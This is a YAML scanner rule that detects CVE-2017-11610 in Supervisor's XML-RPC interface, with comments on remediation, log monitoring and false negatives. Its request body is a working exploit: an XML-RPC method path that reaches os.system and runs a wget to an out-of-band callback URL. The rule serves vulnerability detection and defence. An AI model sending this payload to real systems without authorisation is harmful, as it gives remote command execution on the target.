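# Detection rule for CVE-2017-11610 in Supervisor's XML-RPC interface.
#
# The rule sends one XML-RPC call to /RPC2 and reports a finding only when an
# out-of-band callback arrives from the target. A match therefore means a
# command was actually executed on the target: this is a state-changing probe,
# not a banner or version check.
#
# Remediation for a confirmed finding: upgrade Supervisor to a release that
# carries the fix for CVE-2017-11610, keep the HTTP control interface
# ([inet_http_server]) off untrusted networks (bind it to loopback or use the
# unix socket), and require a username and password on it.
#
# Monitoring hint: POST requests to /RPC2 whose <methodName> goes deeper than
# the documented "supervisor.*" API (here it starts with
# "supervisor.supervisord.") are worth alerting on in proxy or web logs.
name: poc-yaml-supervisord-cve-2017-11610
set:
  # Out-of-band listener allocated by the scanner; reverseURL is the unique
  # callback address substituted into the request body below.
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  # No credentials are sent. An interface that demands authentication will not
  # answer 200, so the rule reports no finding even if the installed version
  # is unpatched; treat a negative result on such hosts as inconclusive.
  - method: POST
    path: /RPC2
    # The method name is a dotted attribute path that leaves the RPC namespace
    # and ends at os.system; the single string parameter is the command.
    # Folded scalar (>-): the lines below are joined with single spaces.
    body: >-
      <?xml version="1.0"?>
      <methodCall>
      <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
      <params>
      <param>
      <string>wget {{reverseURL}}</string>
      </param>
      </params>
      </methodCall>
    follow_redirects: false
    # HTTP 200 alone proves nothing, because XML-RPC faults are also returned
    # with status 200; the callback within 5 seconds is the real signal.
    # False negatives are possible when the target has no wget, when outbound
    # traffic is filtered, or when the callback takes longer than the wait.
    expression: |
      response.status == 200 && reverse.wait(5)
detail:
  author: Loneyer
  links:
    - https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610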